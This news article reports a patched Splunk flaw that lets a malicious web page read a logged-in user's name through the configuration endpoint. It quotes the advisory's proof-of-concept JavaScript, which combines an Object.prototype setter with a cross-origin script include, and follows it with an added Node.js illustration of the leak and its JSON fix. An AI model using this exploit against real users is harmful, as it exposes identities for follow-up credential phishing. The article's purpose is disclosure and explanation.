That sound you hear is Splunk leaking data

Visit a malicious web page and JavaScript extracts user names


Splunk has patched a flaw in the JavaScript side of its web interface that leaks user information to third-party websites.

The advisory at Full Disclosure explains that the leak happens if an attacker tricks a user who is already logged in to Splunk into visiting a malicious web page.

It leaks only the username and whether or not that user has remote access enabled, but that is enough for an attacker to mount a convincing follow-up phishing attempt to obtain the user's credentials.

The bug, the advisory says, is in how Splunk used Object prototypes in JavaScript: because the configuration endpoint returns executable script rather than inert data, a page that defines a setter on Object.prototype and then loads that endpoint as a script is handed the configuration values when Splunk's code assigns them.

Here's the proof-of-concept JavaScript from the advisory:

<script>
// Attacker-controlled page. Any later assignment to a property named "$C" on an
// object that inherits from Object.prototype now calls this setter with the value.
Object.defineProperty(Object.prototype, "$C", { set: function(val) {
    // A fake login prompt was left commented out in the advisory:
    //prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername:"+val.USERNAME, "Password")
    // Display every field that Splunk's configuration script assigned to $C.
    for (var i in val) {
        alert("" + i + " " + val[i]);
    }
  }
});
</script>

<!-- Loading the logged-in user's configuration endpoint as a script makes the browser
     execute Splunk's response inside the attacker's page, with the setter above in place. -->
<script src="https://VICTIM-IP:8000/en-US/config?autoload=1" type="text/javascript"></script>
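As an added illustration (not code from the advisory or from Splunk), the Node.js script below shows why the setter above receives the data and why serving the same data as a bare JSON object, rather than as executable script, defeats inclusion via <script src>. The exact response body Splunk returned is not reproduced in the article; the `$C = {...}` assignment, the field names and the values below are constructed to mirror the PoC.

```javascript
// Added illustration (not from the advisory or Splunk); sample values are constructed.
const SAMPLE_CONFIG = { USERNAME: 'alice', REMOTE_ACCESS: false };

// Vulnerable pattern (assumed to mirror what the PoC relies on): the endpoint
// returns executable JavaScript that assigns the config to a global named $C.
const VULNERABLE_BODY = '$C = ' + JSON.stringify(SAMPLE_CONFIG) + ';';

// Hardened pattern: the same data as a bare JSON object. A JSON object is not a
// valid JavaScript program, so a <script src> include fails to parse and runs
// nothing, while a same-origin XMLHttpRequest can still JSON.parse it.
const HARDENED_BODY = JSON.stringify(SAMPLE_CONFIG);

// Run `body` the way a <script src> would (sloppy-mode code). `scope` stands in
// for the page's window object: an ordinary object whose prototype chain ends
// at Object.prototype, so an inherited setter fires on `scope.$C = ...`.
function runAsScript(body, scope) {
  try {
    new Function('scope', 'with (scope) { ' + body + ' }')(scope);
    return { ran: true, error: null };
  } catch (e) {
    return { ran: false, error: e.constructor.name };
  }
}

// Attacker's page, as in the PoC above: a setter on Object.prototype for "$C"
// receives whatever the included script assigns to that name.
function simulateLeak(servedBody) {
  let captured = null;
  Object.defineProperty(Object.prototype, '$C', {
    configurable: true,
    set(val) { captured = val; },
  });
  const pageGlobal = {};
  const result = runAsScript(servedBody, pageGlobal);
  delete Object.prototype.$C; // undo the pollution so later code is unaffected
  return { ...result, leakedUsername: captured ? captured.USERNAME : null };
}

// Legitimate same-origin consumer of the hardened response.
function consumeAsJson(body) {
  return JSON.parse(body);
}

console.log('vulnerable:', simulateLeak(VULNERABLE_BODY)); // leakedUsername 'alice'
console.log('hardened:  ', simulateLeak(HARDENED_BODY));   // SyntaxError, no leak
```

The same check applies to any endpoint that returns per-user data: if the body parses as a program, a cross-origin page can include it as a script; a bare JSON object, or a non-executable prefix, cannot be executed that way.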

The issue affects Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.13.1, 6.1.x before 6.1.13, 6.0.x before 6.0.14, 5.0.x before 5.0.18 and Splunk Light before 6.5.2, and the company has issued patches for all versions. ®


Biting the hand that feeds IT © 1998–2022